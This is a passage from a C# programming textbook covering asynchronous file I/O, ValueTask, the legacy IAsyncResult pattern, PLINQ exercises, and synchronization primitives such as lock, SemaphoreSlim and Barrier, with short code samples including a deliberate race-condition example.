also provides the PickMultipleFilesAsync method by which a user can select
more than one file.) The value returned by this method is
Task<StorageFile>, and the await operator extracts the StorageFile object
from this result. The StorageFile class provides an abstraction of a file held
on hard disk, and by using this class, you can open a file and read from it or
write to it.
Note Strictly speaking, the PickSingleFileAsync method returns an
object of type IAsyncOperation<StorageFile>. WinRT uses its own
abstraction of asynchronous operations and maps .NET Framework
Task objects to this abstraction; the Task class implements the
IAsyncOperation interface. If you are programming in C#, your code is
not affected by this transformation, and you can simply use Task objects
without concerning yourself with how they get mapped to WinRT
asynchronous operations.
File input/output (I/O) is another source of potentially slow operations,
and the StorageFile class implements a raft of asynchronous methods by
which these operations can be performed without impacting the
responsiveness of an application. For example, in Chapter 5, after the user
selects a file using a FileOpenPicker object, the code then opens this file for
reading, asynchronously:
StorageFile file = await fp.PickSingleFileAsync();
...
var fileStream = await file.OpenAsync(FileAccessMode.Read);
One final example that is directly applicable to the exercises you have
seen in this and the previous chapter concerns writing to a stream. You might
have noticed that although the time reported to generate the data for the graph
is a few seconds, it can take up to twice that amount of time before the graph
actually appears. This happens because of the way the data is written to the
bitmap. The bitmap renders data held in a buffer as part of the
WriteableBitmap object, and the AsStream extension method provides a
Stream interface to this buffer. The data is written to the buffer via this
stream by using the Write method, like this:
...
Stream pixelStream = graphBitmap.PixelBuffer.AsStream();
pixelStream.Seek(0, SeekOrigin.Begin);
pixelStream.Write(data, 0, data.Length);
...
Unless you have reduced the value of the pixelWidth and pixelHeight
fields to save memory, the volume of data written to the buffer is just over
570 MB (15,000 * 10,000 * 4 bytes), so this Write operation can take a few
seconds. To improve response time, you can perform this operation
asynchronously by using the WriteAsync method:
await pixelStream.WriteAsync(data, 0, data.Length);
In summary, when you build applications for Windows, you should seek
to exploit asynchronicity wherever possible.
Tasks, memory allocation, and efficiency
Just because a method is tagged as async, it does not mean that it will always
execute asynchronously. Consider the following method:
public async Task<int> FindValueAsync(string key)
{
bool foundLocally = GetCachedValue(key, out int result);
if (foundLocally)
return result;
result = await RetrieveValue(key); // possibly takes a long time
AddItemToLocalCache(key, result);
return result;
}
The purpose of this method is to look up an integer value associated with a
string key; for example, you might be looking up a customer ID given the
customer’s name, or you could be retrieving a piece of data based on a string
containing an encrypted key. The FindValueAsync method implements the
Cache-Aside pattern (see
https://docs.microsoft.com/en-us/azure/architecture/patterns/cache-aside
for a detailed discussion of this
pattern), whereby the results of a potentially lengthy calculation or lookup
operation are cached locally when they are performed in case they are needed
again in the near future. If the same key value is passed to a subsequent call
of FindValueAsync, the cached data can be retrieved. The pattern uses the
following helper methods (the implementations of these methods are not
shown):
GetCachedValue. This method checks the cache for an item with the
specified key and, if the item is available, passes it back in the out
parameter. The return value of the method is true if the data was found
in the cache, false otherwise.
RetrieveValue. This method runs if the item was not found in the
cache; it performs the calculation or lookups necessary to find the data
and returns it. This method could potentially take a significant time to
run, so it is performed asynchronously.
AddItemToLocalCache. This method adds the specified item to the
local cache in case it is requested again. This will save the application
from having to perform the expensive RetrieveValue operation again.
In an ideal world, the cache will account for the vast majority of the data
requested over the lifetime of the application, and the number of times it is
necessary to invoke RetrieveValue should become vanishingly small.
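The implementations of these helper methods are not shown, but a minimal
in-memory sketch of the caching side of the pattern might use a Dictionary,
as follows. (This is an illustration only; a production cache would also
have to address thread safety and eviction.)

private readonly Dictionary<string, int> cache = new Dictionary<string, int>();

private bool GetCachedValue(string key, out int result)
{
    // Returns true and populates result if the key has been cached previously
    return cache.TryGetValue(key, out result);
}

private void AddItemToLocalCache(string key, int result)
{
    // Record the value so that future lookups can avoid calling RetrieveValue
    cache[key] = result;
}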
Now consider what happens each time your code calls the
FindValueAsync method. In most cases, the work will be performed
synchronously (it finds the data in cache). The data is an integer, but it is
returned wrapped in a Task<int> object. Creating and populating this object,
and then retrieving the data from this object when the method returns,
requires more effort in terms of processing power and memory allocation
than simply returning an int. C# caters to this situation by providing the
ValueTask generic type. You use it to specify the return type of an async
method, but the return value is marshaled as a value type on the stack rather
than a reference on the heap:
public async ValueTask<int> FindValueAsync(string key)
{
bool foundLocally = GetCachedValue(key, out int result);
if (foundLocally)
return result;
result = await RetrieveValue(key); // possibly takes a long time
AddItemToLocalCache(key, result);
return result;
}
Note that this does not mean that you should always use ValueTask rather
than Task. If an asynchronous method actually performs the await operation,
then using ValueTask can decrease the efficiency of your code quite
significantly, for reasons that I don’t have time or space to go into here. So,
in general, consider returning a ValueTask object only if the vast majority of
the calls to an async method are likely to be performed synchronously,
otherwise stick to the Task type.
Note To use the ValueTask type, you must use the NuGet Package
Manager to add the System.Threading.Tasks.Extensions package to
your project.
The IAsyncResult design pattern in earlier versions
of the .NET Framework
Asynchronicity has long been recognized as a key element in building
responsive applications with the .NET Framework, and the concept
predates the introduction of the Task class in the .NET Framework
version 4.0. Microsoft introduced the IAsyncResult design pattern based
on the AsyncCallback delegate type to handle these situations. The
exact details of how this pattern works are not appropriate in this book,
but from a programmer’s perspective the implementation of this pattern
meant that many types in the .NET Framework class library exposed
long-running operations in two ways: in a synchronous form consisting
of a single method, and in an asynchronous form that used a pair of
methods, named BeginOperationName and EndOperationName, where
OperationName specified the operation being performed. For example,
the MemoryStream class in the System.IO namespace provides the Write
method to write data synchronously to a stream in memory, but it also
provides the BeginWrite and EndWrite methods to perform the same
operation asynchronously. The BeginWrite method initiates the write
operation that is performed on a new thread. The BeginWrite method
expects the programmer to provide a reference to a callback method that
runs when the write operation completes; this reference is in the form of
an AsyncCallback delegate. In this method, the programmer should
implement any appropriate tidying up and call the EndWrite method to
signify that the operation has completed. The following code example
shows this pattern in action:
...
Byte[] buffer = ...; // populated with data to write to the MemoryStream
MemoryStream ms = new MemoryStream();
AsyncCallback callback = new
AsyncCallback(handleWriteCompleted);
ms.BeginWrite(buffer, 0, buffer.Length, callback, ms);
...
private void handleWriteCompleted(IAsyncResult ar)
{
MemoryStream ms = ar.AsyncState as MemoryStream;
... // Perform any appropriate tidying up
ms.EndWrite(ar);
}
The parameter to the callback method (handleWriteCompleted) is an
IAsyncResult object that contains information about the status of the
asynchronous operation and any other state information. You can pass
user-defined information to the callback in this parameter; the final
argument supplied to the BeginOperationName method is packaged into
this parameter. In this example, the callback is passed a reference to the
MemoryStream.
Although this sequence works, it is a messy paradigm that obscures
the operation you are performing. The code for the operation is split
into two methods, and it is easy to lose the mental connection between
these methods if you have to maintain this code. If you are using Task
objects, you can simplify this model by calling the static FromAsync
method of the TaskFactory class. This method takes the
BeginOperationName and EndOperationName methods and wraps them
into code that is performed by using a Task. There is no need to create
an AsyncCallback delegate because this is generated behind the scenes
by the FromAsync method. So you can perform the same operation
shown in the previous example like this:
...
Byte[] buffer = ...;
MemoryStream s = new MemoryStream();
Task t = Task.Factory.FromAsync(s.BeginWrite, s.EndWrite,
    buffer, 0, buffer.Length, null);
await t;
...
This technique is useful if you need to access asynchronous
functionality exposed by types developed in earlier versions of the
.NET Framework.
Using PLINQ to parallelize declarative data access
Data access is another area for which response time is important, especially if
you are building applications that have to search through lengthy data
structures. In earlier chapters, you saw how powerful LINQ is for retrieving
data from an enumerable data structure, but the examples shown were
inherently single-threaded. Parallel LINQ (PLINQ) provides a set of
extensions to LINQ that is based on Tasks, and that can help you boost
performance and parallelize some query operations.
PLINQ works by dividing a data set into partitions and then using tasks to
retrieve the data that matches the criteria specified by the query for each
partition in parallel. When the tasks have completed, the results retrieved for
each partition are combined into a single enumerable result set. PLINQ is
ideal for scenarios that involve data sets with large numbers of elements, or if
the criteria specified for matching data involve complex, computationally
expensive operations.
An important aim of PLINQ is to be as nonintrusive as possible. To
convert a LINQ query into a PLINQ query, you use the AsParallel extension
method. The AsParallel method returns a ParallelQuery object that acts
similarly to the original enumerable object, except that it provides parallel
implementations of many of the LINQ operators, such as join and where.
These implementations of the LINQ operators are based on tasks and use
various algorithms to try to run parts of your LINQ query in parallel
wherever possible. However, as ever in the world of parallel computing, the
AsParallel method is not magic. You cannot guarantee that your code will
speed up; it all depends on the nature of your LINQ queries and whether the
tasks they are performing lend themselves to parallelization.
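As a minimal illustration of the shape of the change (assuming a hypothetical
numbers array of integers), the only difference between the serial and parallel
forms of a simple query is the call to AsParallel:

int[] numbers = ...; // hypothetical data source

// Ordinary LINQ: evaluated on a single thread
var evens = from n in numbers
            where n % 2 == 0
            select n;

// PLINQ: AsParallel returns a ParallelQuery, and the where clause
// can now be evaluated by several tasks running in parallel
var evensParallel = from n in numbers.AsParallel()
                    where n % 2 == 0
                    select n;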
To understand how PLINQ works and the situations in which it is useful,
it helps to see some examples. The exercises in the following sections
demonstrate a pair of simple scenarios.
Using PLINQ to improve performance while iterating
through a collection
The first scenario is simple. Consider a LINQ query that iterates through a
collection and retrieves elements from the collection based on a processor-
intensive calculation. This form of query can benefit from parallel execution
as long as the calculations are independent. The elements in the collection
can be divided into several partitions; the exact number depends on the current
load of the computer and the number of CPUs available. The elements in
each partition can be processed by a separate thread. When all the partitions
have been processed, the results can be merged. Any collection that supports
access to elements through an index, such as an array or a collection that
implements the IList<T> interface, can be managed in this way.
Parallelize a LINQ query over a simple collection
1. Using Visual Studio 2017, open the PLINQ solution, which is located in
the \Microsoft Press\VCSBS\Chapter 24\PLINQ folder in your
Documents folder.
2. In Solution Explorer, double-click Program.cs in the PLINQ project to
display the file in the Code and Text Editor window.
This is a console application. The skeleton structure of the application
has been created for you. The Program class contains methods named
Test1 and Test2 that illustrate a pair of common scenarios. The Main
method calls each of these test methods in turn.
Both test methods have the same general structure: they create a LINQ
query (you will add the code to do this later in this set of exercises), run
it, and display the time taken. The code for each of these methods is
almost completely separate from the statements that actually create and
run the queries.
3. Examine the Test1 method.
This method creates a large array of integers and populates it with a set
of random numbers between 0 and 200. The random number generator
is seeded, so you should get the same results every time you run the
application.
4. Immediately after the first TO DO comment in this method, add the
LINQ query shown here in bold:
// TO DO: Create a LINQ query that retrieves all numbers that are greater than 100
var over100 = from n in numbers
              where TestIfTrue(n > 100)
              select n;
This LINQ query retrieves all the items in the numbers array that have a
value greater than 100. The test n > 100 is not by itself computationally
intensive enough to show the benefits of parallelizing this query, so the
code calls a method named TestIfTrue, which slows it down a little by
performing a SpinWait operation. The SpinWait method causes the
processor to continually execute a loop of special “no operation”
instructions for a short period, keeping the processor busy but not
actually doing any work. (This is known as spinning.) The TestIfTrue
method looks like this:
public static bool TestIfTrue(bool expr)
{
    Thread.SpinWait(100);
    return expr;
}
5. After the second TO DO comment in the Test1 method, add the
following code shown in bold:
// TO DO: Run the LINQ query, and save the results in a List<int> object
List<int> numbersOver100 = new List<int>(over100);
Remember that LINQ queries use deferred execution, so they do not run
until you retrieve the results from them. This statement creates a
List<int> object and populates it with the results of running the over100
query.
6. After the third TO DO comment in the Test1 method, add the following
statement shown in bold:
// TO DO: Display the results
Console.WriteLine($"There are {numbersOver100.Count} numbers over 100");
7. On the Debug menu, click Start Without Debugging. Note the time that
running Test 1 takes and the number of items in the array that are greater
than 100.
8. Run the application several times, and take an average of the time.
Verify that the number of items greater than 100 is the same each time
(the application uses the same random number seed each time it runs to
ensure the repeatability of the tests). Return to Visual Studio when you
have finished.
9. The logic that selects each item returned by the LINQ query is
independent of the selection logic for all the other items, so this query is
an ideal candidate for partitioning. Modify the statement that defines the
LINQ query, and specify the AsParallel extension method to the
numbers array, as shown here in bold:
var over100 = from n in numbers.AsParallel()
              where TestIfTrue(n > 100)
              select n;
Note If the selection logic or calculations require access to shared
data, you must synchronize the tasks that run in parallel; otherwise,
the results might be unpredictable. However, synchronization can
impose an overhead and might negate the benefits of parallelizing
the query.
10. On the Debug menu, click Start Without Debugging. Verify that the
number of items reported by Test1 is the same as before but that the time
taken to perform the test has decreased significantly. Run the test several
times, and take an average of the duration required for the test.
If you are running on a dual-core processor (or a twin-processor
computer), you should see the time reduced by 40 to 45 percent. If you
have more processor cores, the decrease should be even more dramatic
(on my quad-core machine, the processing time dropped from 8.3
seconds to 2.4).
11. Close the application, and return to Visual Studio.
The preceding exercise shows the performance improvement you can
attain by making a small change to a LINQ query. However, keep in mind
that you will see results such as this only if the calculations performed by the
query take some time. I cheated a little by spinning the processor. Without
this overhead, the parallel version of the query is actually slower than the
serial version. In the next exercise, you will see a LINQ query that joins two
arrays in memory. This time, the exercise uses more realistic data volumes,
so there is no need to slow down the query artificially.
Parallelize a LINQ query that joins two collections
1. In Solution Explorer, open the Data.cs file in the Code and Text Editor
window and locate the CustomersInMemory class.
This class contains a public string array called Customers. Each string in
the Customers array holds the data for a single customer, with the fields
separated by commas; this format is typical of data that an application
might read in from a text file that uses comma-separated fields. The first
field contains the customer ID, the second field contains the name of the
company that the customer represents, and the remaining fields hold the
address, city, country or region, and postal code.
2. Find the OrdersInMemory class.
This class is similar to the CustomersInMemory class except that it
contains a string array called Orders. The first field in each string is the
order number, the second field is the customer ID, and the third field is
the date that the order was placed.
3. Find the OrderInfo class. This class contains four fields: the customer
ID, company name, order ID, and order date for an order. You will use a
LINQ query to populate a collection of OrderInfo objects from the data
in the Customers and Orders arrays.
4. Display the Program.cs file in the Code and Text Editor window and
locate the Test2 method in the Program class.
In this method, you will create a LINQ query that joins the Customers
and Orders arrays by using the customer ID to return a list of customers
and the orders that each customer has placed. The query will store each
row of the result in an OrderInfo object.
5. In the try block in this method, after the first TO DO comment, add the
code shown next in bold:
// TO DO: Create a LINQ query that retrieves customers and orders from arrays
// Store each row returned in an OrderInfo object
var orderInfoQuery =
    from c in CustomersInMemory.Customers
    join o in OrdersInMemory.Orders
    on c.Split(',')[0] equals o.Split(',')[1]
    select new OrderInfo
    {
        CustomerID = c.Split(',')[0],
        CompanyName = c.Split(',')[1],
        OrderID = Convert.ToInt32(o.Split(',')[0]),
        OrderDate = Convert.ToDateTime(o.Split(',')[2], new CultureInfo("en-US"))
    };
This statement defines the LINQ query. Notice that it uses the Split
method of the String class to split each string into an array of strings.
The strings are split on the comma character. (The commas are stripped
out.) One complication is that the dates in the array are held in United
States English format, so the code that converts them into DateTime
objects in the OrderInfo object specifies the United States English
formatter. If you use the default formatter for your locale, the dates
might not parse correctly. All in all, this query performs a significant
amount of work to generate the data for each item.
6. In the Test2 method, after the second TO DO statement, add the
following code shown in bold:
// TO DO: Run the LINQ query, and save the results in a List<OrderInfo> object
List<OrderInfo> orderInfo = new List<OrderInfo>(orderInfoQuery);
This statement runs the query and populates the orderInfo collection.
7. After the third TO DO statement, add the statement shown here in bold:
// TO DO: Display the results
Console.WriteLine($"There are {orderInfo.Count} orders");
8. In the Main method, comment out the statement that calls the Test1
method and uncomment the statement that calls the Test2 method, as
shown in the following code in bold:
static void Main(string[] args)
{
    // Test1();
    Test2();
}
9. On the Debug menu, click Start Without Debugging.
10. Verify that Test2 retrieves 830 orders, and note the duration of the test.
Run the application several times to obtain an average duration, and then
return to Visual Studio.
11. In the Test2 method, modify the LINQ query and add the AsParallel
extension method to the Customers and Orders arrays, as shown here in
bold:
var orderInfoQuery =
    from c in CustomersInMemory.Customers.AsParallel()
    join o in OrdersInMemory.Orders.AsParallel()
    on c.Split(',')[0] equals o.Split(',')[1]
    select new OrderInfo
    {
        CustomerID = c.Split(',')[0],
        CompanyName = c.Split(',')[1],
        OrderID = Convert.ToInt32(o.Split(',')[0]),
        OrderDate = Convert.ToDateTime(o.Split(',')[2], new CultureInfo("en-US"))
    };
Warning When you join two data sources in this way, they must
both be IEnumerable objects or ParallelQuery objects. This means
that if you specify the AsParallel method for one source, you
should also specify AsParallel for the other. If you fail to do this,
your code will not run—it will stop with an error.
12. Run the application several times. Notice that the time taken for Test2
should be significantly less than it was previously. PLINQ can make use
of multiple threads to optimize join operations by fetching the data for
each part of the join in parallel.
13. Close the application and return to Visual Studio.
These two simple exercises have shown you the power of the AsParallel
extension method and PLINQ. Note that PLINQ is an evolving technology,
and the internal implementation is very likely to change over time.
Additionally, the volumes of data and the amount of processing you perform
in a query also have a bearing on the effectiveness of using PLINQ.
Therefore, you should not regard these exercises as defining fixed rules that
you should always follow. Rather, they illustrate the point that you should
carefully measure and assess the likely performance or other benefits of using
PLINQ with your own data, in your own environment.
Canceling a PLINQ query
Unlike with ordinary LINQ queries, you can cancel a PLINQ query. To do
this, you specify a CancellationToken object from a
CancellationTokenSource and use the WithCancellation extension method of
the ParallelQuery.
CancellationToken tok = ...;
...
var orderInfoQuery =
    from c in CustomersInMemory.Customers.AsParallel().WithCancellation(tok)
    join o in OrdersInMemory.Orders.AsParallel()
    on ...
You specify WithCancellation only once in a query. Cancellation applies
to all sources in the query. If the CancellationTokenSource object used to
generate the CancellationToken is canceled, the query stops with an
OperationCanceledException exception.
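As a minimal sketch (the data source and query body are placeholders from the
earlier example), the exception surfaces when the query is enumerated, so that
is where you catch it:

CancellationTokenSource cts = new CancellationTokenSource();
var query = from c in CustomersInMemory.Customers
                     .AsParallel()
                     .WithCancellation(cts.Token)
            select c;
try
{
    // The query runs lazily; cancellation is observed during enumeration
    foreach (var item in query)
    {
        ...
    }
}
catch (OperationCanceledException)
{
    // Another thread called cts.Cancel while the query was running
}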
Synchronizing concurrent access to data
PLINQ is not always the most appropriate technology to use for an
application. If you create your own tasks manually, you need to ensure that
these tasks coordinate their activities correctly. The .NET Framework class
library provides methods with which you can wait for tasks to complete, and
you can use these methods to coordinate tasks at a very coarse level. But
consider what happens if two tasks attempt to access and modify the same
data. If both tasks run at the same time, their overlapping operations might
corrupt the data. This situation can lead to bugs that are difficult to correct,
primarily because of their unpredictability.
The Task class provides a powerful framework with which you can design
and build applications that take advantage of multiple CPU cores to perform
tasks in parallel. However, you need to be careful when building solutions
that perform concurrent operations, especially if those operations share access
to data. You have little control over how parallel operations are scheduled or
even the degree of parallelism that the operating system might provide to an
application constructed by using tasks. These decisions are left as run-time
considerations and depend on the workload and hardware capabilities of the
computer running your application. This level of abstraction was a deliberate
design decision on the part of the Microsoft development team, and it
removes the need for you to understand the low-level threading and
scheduling details when you build applications that require concurrent tasks.
But this abstraction comes at a cost. Although it all appears to work
magically, you must make some effort to understand how your code runs;
otherwise, you can end up with applications that exhibit unpredictable (and
erroneous) behavior, as shown in the following example (this sample is
available in the ParallelTest project in the folder containing the code for
Chapter 24):
using System;
using System.Threading;

class Program
{
    private const int NUMELEMENTS = 10;

    static void Main(string[] args)
    {
        SerialTest();
    }

    static void SerialTest()
    {
        int[] data = new int[NUMELEMENTS];
        int j = 0;
        for (int i = 0; i < NUMELEMENTS; i++)
        {
            j = i;
            doAdditionalProcessing();
            data[i] = j;
            doMoreAdditionalProcessing();
        }

        for (int i = 0; i < NUMELEMENTS; i++)
        {
            Console.WriteLine($"Element {i} has value {data[i]}");
        }
    }

    static void doAdditionalProcessing()
    {
        Thread.Sleep(10);
    }

    static void doMoreAdditionalProcessing()
    {
        Thread.Sleep(10);
    }
}
The SerialTest method populates an integer array with a set of values (in a
rather long-winded way) and then iterates through this list, printing the index
of each item in the array together with the value of the corresponding item.
The doAdditionalProcessing and doMoreAdditionalProcessing methods
simply simulate the performance of long-running operations as part of the
processing that might cause the runtime to yield control of the processor. The
output of the program is shown here:
Element 0 has value 0
Element 1 has value 1
Element 2 has value 2
Element 3 has value 3
Element 4 has value 4
Element 5 has value 5
Element 6 has value 6
Element 7 has value 7
Element 8 has value 8
Element 9 has value 9
Now consider the ParallelTest method, shown next. This method is the
same as the SerialTest method except that it uses the Parallel.For construct
to populate the data array by running concurrent tasks. The code in the
lambda expression run by each task is identical to that in the initial for loop in
the SerialTest method.
using System.Threading.Tasks;
...
static void ParallelTest()
{
    int[] data = new int[NUMELEMENTS];
    int j = 0;
    Parallel.For(0, NUMELEMENTS, (i) =>
    {
        j = i;
        doAdditionalProcessing();
        data[i] = j;
        doMoreAdditionalProcessing();
    });

    for (int i = 0; i < NUMELEMENTS; i++)
    {
        Console.WriteLine($"Element {i} has value {data[i]}");
    }
}
The intention is for the ParallelTest method to perform the same operation
as the SerialTest method, except by using concurrent tasks and (with luck)
running a little faster as a result. The problem is that it might not always
work as expected. Some sample output generated by the ParallelTest method
is shown here:
Element 0 has value 8
Element 1 has value 9
Element 2 has value 8
Element 3 has value 9
Element 4 has value 8
Element 5 has value 9
Element 6 has value 9
Element 7 has value 9
Element 8 has value 8
Element 9 has value 8
The values assigned to each item in the data array are not always the same
as the values generated by using the SerialTest method. Additionally, further
runs of the ParallelTest method can produce different sets of results.
If you examine the logic in the Parallel.For construct, you should see
where the problem lies. The lambda expression contains the following
statements:
j = i;
doAdditionalProcessing();
data[i] = j;
doMoreAdditionalProcessing();
The code looks innocuous enough. It copies the current value of the
variable i (the index variable identifying which iteration of the loop is
running) into the variable j, and later on it stores the value of j in the element
of the data array indexed by i. If i contains 5, j is assigned the value 5, and
later on the value of j is stored in data[5]. But between assigning the value to
j and then reading it back, the code does more work; it calls the
doAdditionalProcessing method. If this method takes a long time to execute,
the runtime might suspend the thread and schedule another task. A concurrent
task that is running another iteration of the Parallel.For construct might run
and assign a new value to j. Consequently, when the original task resumes,
the value of j it assigns to data[5] is not the value it stored, and the result is
data corruption. More troublesome is that sometimes this code might run as
expected and produce the correct results, and at other times it might not; it all
depends on how busy the computer is and when the various tasks are
scheduled. Consequently, these types of bugs can lie dormant during testing
and then suddenly manifest in a production environment.
The variable j is shared by all the concurrent tasks. If a task stores a value
in j and later reads it back, it has to ensure that no other task has modified j in
the meantime. This requires synchronizing access to the variable across all
concurrent tasks that can access it. One way in which you can achieve
synchronized access is to lock data.
Locking data
The C# language provides locking semantics through the lock keyword,
which you can use to guarantee exclusive access to resources. You use the
lock keyword like this:
object myLockObject = new object();
...
lock (myLockObject)
{
    // Code that requires exclusive access to a shared resource
    ...
}
The lock statement attempts to obtain a mutual-exclusion lock over the
specified object (you can actually use any reference type, not just object), and
it blocks if this same object is currently locked by another thread. When the
thread obtains the lock, the code in the block following the lock statement
runs. At the end of this block, the lock is released. If another thread is
blocked waiting for the lock, it can then grab the lock and continue its
processing.
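For example, one way to make the earlier ParallelTest method produce correct
results is to guard the statements that read and write the shared variable j
with a lock (a sketch; note that serializing the body of the loop in this way
also removes most of the benefit of running the iterations in parallel, so
restructuring the code to avoid the shared variable is usually preferable):

object myLockObject = new object();
int[] data = new int[NUMELEMENTS];
int j = 0;
Parallel.For(0, NUMELEMENTS, (i) =>
{
    lock (myLockObject)
    {
        // Only one task at a time can run this block, so no other task
        // can change j between the assignment and the read
        j = i;
        doAdditionalProcessing();
        data[i] = j;
    }
    doMoreAdditionalProcessing();
});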
Synchronization primitives for coordinating tasks
The lock keyword is fine for many simple scenarios, but in some situations,
you might have more complex requirements. The System.Threading
namespace includes some additional synchronization primitives that you can
use to address these situations. These synchronization primitives are classes
designed for use with tasks; they expose locking mechanisms that restrict
access to a resource while a task holds the lock. They support a variety of
locking techniques that you can use to implement different styles of
concurrent access, ranging from simple exclusive locks (where a single task
has sole access to a resource), to semaphores (where multiple tasks can
access a resource simultaneously but in a controlled manner), to reader/writer
locks that enable different tasks to share read-only access to a resource while
guaranteeing exclusive access to a thread that needs to modify the resource.
The following list summarizes some of these primitives. For more
information and examples, consult the documentation provided with Visual
Studio 2017.
Note The .NET Framework has included a respectable set of
synchronization primitives since its initial release. The following list
describes only the more recent primitives included in the
System.Threading namespace. There is some overlap between the new
primitives and those provided previously. Where overlapping
functionality exists, you should use the more recent alternatives because
they have been designed and optimized for computers with multiple
CPUs.
A detailed discussion of the theory of all the possible
synchronization mechanisms available for building multithreaded
applications is beyond the scope of this book. For more information
about the general theory of multiple threads and synchronization, see
the topic “Synchronizing Data for Multithreading” in the documentation
provided with Visual Studio 2017.
ManualResetEventSlim The ManualResetEventSlim class provides
functionality by which one or more tasks can wait for an event.
A ManualResetEventSlim object can be in one of two states: signaled
(true) and unsignaled (false). A task creates a ManualResetEventSlim
object and specifies its initial state. Other tasks can wait for the
ManualResetEventSlim object to be signaled by calling the Wait method.
If the ManualResetEventSlim object is in the unsignaled state, the Wait
method blocks the tasks. Another task can change the state of the
ManualResetEventSlim object to signaled by calling the Set method.
This action releases all tasks waiting on the ManualResetEventSlim
object, which can then resume running. The Reset method changes the
state of a ManualResetEventSlim object back to unsignaled.
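A minimal sketch of this handshake, using two tasks, might look like this:

ManualResetEventSlim dataReady = new ManualResetEventSlim(false); // initially unsignaled
...
Task consumer = Task.Run(() =>
{
    dataReady.Wait();  // blocks until another task calls Set
    // Safe to read the shared data here
    ...
});

Task producer = Task.Run(() =>
{
    // Prepare the shared data
    ...
    dataReady.Set();   // releases all tasks waiting on dataReady
});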
SemaphoreSlim You can use the SemaphoreSlim class to control
access to a pool of resources.
A SemaphoreSlim object has an initial value (a nonnegative integer) and
an optional maximum value. Typically, the initial value of a
SemaphoreSlim object is the number of resources in the pool. Tasks
accessing the resources in the pool first call the Wait method. This
method attempts to decrement the value of the SemaphoreSlim object,
and if the result is nonzero, the thread is allowed to continue and can
take a resource from the pool. When it has finished, the task should call
the Release method on the SemaphoreSlim object. This action
increments the value of the SemaphoreSlim object.
If a task calls the Wait method and the result of decrementing the value
of the SemaphoreSlim object would result in a negative value, the task
waits until another task calls Release.
The SemaphoreSlim class also provides the CurrentCount property,
which you can use to determine whether a Wait operation is likely to
succeed immediately or will result in blocking.
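For example, a minimal sketch that limits concurrent access to a pool of three
resources might look like this:

SemaphoreSlim pool = new SemaphoreSlim(3); // three resources available
...
pool.Wait();        // decrements the count; blocks if the count is zero
try
{
    // Use one of the three pooled resources
    ...
}
finally
{
    pool.Release(); // increments the count, releasing a waiting task
}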
CountdownEvent You can think of the CountdownEvent class as a
cross between the inverse of a semaphore and a manual reset event.
When a task creates a CountdownEvent object, it specifies an initial
value (a nonnegative integer). One or more tasks can call the Wait
method of the CountdownEvent object, and if its value is nonzero, the
tasks are blocked. Wait does not decrement the value of the
CountdownEvent object; instead, other tasks can call the Signal method
to reduce the value. When the value of the CountdownEvent object
reaches zero, all blocked tasks are signaled and can resume running.
A task can set the value of a CountdownEvent object back to the value
specified in its constructor by using the Reset method, and a task can
increase this value by calling the AddCount method. You can determine
whether a call to Wait is likely to block by examining the CurrentCount
property.
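For example, the following sketch waits for three worker tasks to signal that
they have finished:

CountdownEvent done = new CountdownEvent(3); // initial value of 3
...
for (int i = 0; i < 3; i++)
{
    Task.Run(() =>
    {
        // Perform a unit of work
        ...
        done.Signal(); // decrements the CountdownEvent
    });
}
done.Wait(); // blocks until the value reaches zero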
ReaderWriterLockSlim The ReaderWriterLockSlim class is an
advanced synchronization primitive that supports a single writer and
multiple readers. The idea is that modifying (writing to) a resource
requires exclusive access, but reading a resource does not; multiple
readers can access the same resource at the same time, but not at the
same time as a writer.
A task that wants to read a resource calls the EnterReadLock method of
a ReaderWriterLockSlim object. This action grabs a read lock on the
object. When the task has finished with the resource, it calls the
ExitReadLock method, which releases the read lock. Multiple tasks can
read the same resource at the same time, and each task obtains its own
read lock.
When a task modifies the resource, it can call the EnterWriteLock
method of the same ReaderWriterLockSlim object to obtain a write lock.
If one or more tasks currently have a read lock for this object, the
EnterWriteLock method blocks until they are all released. After a task
has a write lock, it can then modify the resource and call the
ExitWriteLock method to release the lock.
A ReaderWriterLockSlim object has only a single write lock. If another
task attempts to obtain the write lock, it is blocked until the first task
releases this write lock.
To ensure that writing tasks are not blocked indefinitely, as soon as a
task requests the write lock, all subsequent calls to EnterReadLock made
by other tasks are blocked until the write lock has been obtained and
released.
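In outline, reading and writing tasks use the lock like this (a sketch, with
the shared resource left abstract):

ReaderWriterLockSlim rwLock = new ReaderWriterLockSlim();
...
// Reading task: many tasks can hold the read lock at the same time
rwLock.EnterReadLock();
// Read the shared resource
...
rwLock.ExitReadLock();

// Writing task: waits until all read locks have been released
rwLock.EnterWriteLock();
// Modify the shared resource
...
rwLock.ExitWriteLock();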
Barrier With the Barrier class, you can temporarily halt the
execution of a set of tasks at a particular point in an application and
continue only when all tasks have reached this point. It is useful for
synchronizing tasks that need to perform a series of concurrent
operations in step with one another.
When a task creates a Barrier object, it specifies the number of tasks in
the set that will be synchronized. You can think of this value as a task
counter maintained internally inside the Barrier class. This value can be
amended later by calling the AddParticipant or RemoveParticipant
method. When a task reaches a synchronization point, it calls the
SignalAndWait method of the Barrier object, which decrements the
thread counter inside the Barrier object. If this counter is greater than
zero, the task is blocked. Only when the counter reaches zero are all the
tasks waiting on the Barrier object released, and only then can they
continue running.
The Barrier class provides the ParticipantCount property, which
specifies the number of tasks that it synchronizes, and the
ParticipantsRemaining property, which indicates how many tasks need
to call SignalAndWait before the barrier is raised and blocked tasks can
continue running.
You can also specify a delegate in the Barrier constructor. This delegate
can refer to a method that runs when all the tasks have arrived at the
barrier. The Barrier object is passed in as a parameter to this method.
The barrier is not raised, and the tasks are not released until this method
completes.
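For example, a sketch of two tasks proceeding through two phases in step might
look like this:

// The delegate runs each time all participants reach the barrier
Barrier barrier = new Barrier(2, b =>
    Console.WriteLine($"Phase {b.CurrentPhaseNumber} complete"));
...
for (int t = 0; t < 2; t++)
{
    Task.Run(() =>
    {
        // Perform phase 1 work
        ...
        barrier.SignalAndWait(); // blocks until both tasks arrive
        // Perform phase 2 work
        ...
        barrier.SignalAndWait();
    });
}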
Canceling synchronization
The ManualResetEventSlim, SemaphoreSlim, CountdownEvent, and Barrier
classes all support cancellation by following the cancellation model described
in Chapter 23. The wait operations for each of these classes can take an
optional CancellationToken parameter, retrieved from a
CancellationTokenSource object. If you call the Cancel method of the
CancellationTokenSource object, each wait operation referencing a
CancellationToken generated from this source is aborted with an
OperationCanceledException exception (possibly wrapped in an
AggregateException exception, depending on the context of the wait
operation).
The following code shows how to invoke the Wait method of a
SemaphoreSlim object and specify a cancellation token. If the wait operation
is canceled, the OperationCanceledException catch handler runs.
CancellationTokenSource cancellationTokenSource = new CancellationTokenSource();
CancellationToken cancellationToken = cancellationTokenSource.Token;
...
// Semaphore that protects a pool of 3 resources
